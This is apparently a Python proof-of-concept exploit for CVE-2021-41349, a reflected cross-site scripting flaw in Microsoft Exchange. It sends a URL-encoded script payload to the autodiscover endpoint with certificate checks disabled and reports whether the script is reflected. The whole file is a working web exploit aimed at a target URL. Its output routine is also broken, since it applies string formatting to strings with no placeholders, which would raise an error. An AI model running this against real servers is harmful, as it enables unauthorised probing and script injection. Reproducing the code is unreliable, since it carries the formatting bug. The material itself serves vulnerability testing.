cve-2021-41349-poc.py

# coding: utf-8
import requests
import argparse


class EXP():
    def __init__(self, args):
        self.name = '''Exchange XSS CVE-2021-41349'''
        self.url = args.url
        self.res = ""

    def _attack(self):
        payload = '''
                    %3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1
                '''

        path='/autodiscover/autodiscover.json'
        headers = {
            'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:55.0) Gecko/20100101 Firefox/55.0",
            'Content-Type': 'application/x-www-form-urlencoded'
        }
        resp = requests.post(self.url+path, headers=headers, data=payload, verify=False)
        if resp.status_code == 500 and 'alert(document.domain);' in resp.text and 'a=""' in resp.text:
            self.res = "Vulnerable!"
        else:
            self.res = "Not Vulnerable..."


def parseArgs():
    parser = argparse.ArgumentParser(description="[Exp]!",
                                     formatter_class=argparse.RawDescriptionHelpFormatter)
    group = parser.add_mutually_exclusive_group()
    group.add_argument("-u", '--url', help="URL to scan; -u http://example.com")
    args = parser.parse_args()

    return args


def output(exp):
    print("##################################")
    print("Name" % exp.name)
    print("URL" % exp.url)
    print("RES" % exp.res)
    print("##################################")


if __name__ == "__main__":
    args = parseArgs()
    exp = EXP(args)
    try:
        exp._attack()
    except Exception as e:
        print(e)
        exp.res = "Error"

    output(exp)